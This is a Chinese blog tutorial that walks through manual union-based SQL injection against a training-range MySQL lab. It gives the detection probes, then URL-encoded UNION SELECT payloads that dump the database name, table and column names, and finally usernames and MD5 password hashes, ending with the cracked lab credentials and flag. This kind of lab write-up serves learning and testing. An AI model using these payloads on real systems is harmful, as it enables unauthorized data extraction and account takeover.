Molet

SQL注入——Union注入攻击——手工注入篇——SQL手工注入漏洞测试(MySQL数据库)

Molet web技术 2023-02-26 776浏览 0

0x00
我这边是利用墨者学院的靶场来进行讲解
靶场地址:https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe
SQL注入原理相关文章:https://www.cnblogs.com/lingyi888/p/12886483.html

0x01

开启靶场我们可以看到登录界面
SQL注入——Union注入攻击——手工注入篇——SQL手工注入漏洞测试(MySQL数据库)

0x02

我们来寻找一下注入点
SQL注入——Union注入攻击——手工注入篇——SQL手工注入漏洞测试(MySQL数据库)
利用工具啊D我们可以找到注入点

0x03
SQL注入——Union注入攻击——手工注入篇——SQL手工注入漏洞测试(MySQL数据库)
可以看到是这样的界面
下面我们来进行检测
我直接给出语句就不一步一步截图了

检测语句:
and 1=1 返回正常
and 1=2 返回错误
order by 4 得到有四个字段数

0x04
利用联合查询来查询回显位置

id=-1%20union%20select%201,2,3,4
判断得到
SQL注入——Union注入攻击——手工注入篇——SQL手工注入漏洞测试(MySQL数据库)

可以知道回显在 2 3这两个字段
接下来,构造拼接语句进行查询

使用回显位爆出数据库名和版本

id=-1%20union%20select%201,database(),version(),4
SQL注入——Union注入攻击——手工注入篇——SQL手工注入漏洞测试(MySQL数据库)

根据数据库名爆破表名

id=-1%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema%20=%20%22mozhe_Discuz_StormGroup%22#
SQL注入——Union注入攻击——手工注入篇——SQL手工注入漏洞测试(MySQL数据库)

根据表名爆破列名

id=-1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name%20=%20%22StormGroup_member%22%20#
SQL注入——Union注入攻击——手工注入篇——SQL手工注入漏洞测试(MySQL数据库)

爆列内容

id=-1%20union%20select%201,group_concat(name),group_concat(password),4%20from%20StormGroup_member%20#
SQL注入——Union注入攻击——手工注入篇——SQL手工注入漏洞测试(MySQL数据库)

0x05
这边可以看到存在两个账户
密码是md5解密一下就可以得到两个账号,其中一个登录就可以

账号一:
mozhe
dsan13
账号二:
mozhe
451866

登录就可以拿到flag了

SQL注入——Union注入攻击——手工注入篇——SQL手工注入漏洞测试(MySQL数据库)

ok,今天就到这里,关注我,一起学习哦

继续浏览有关 数据库技术文章/教程 的文章
发表评论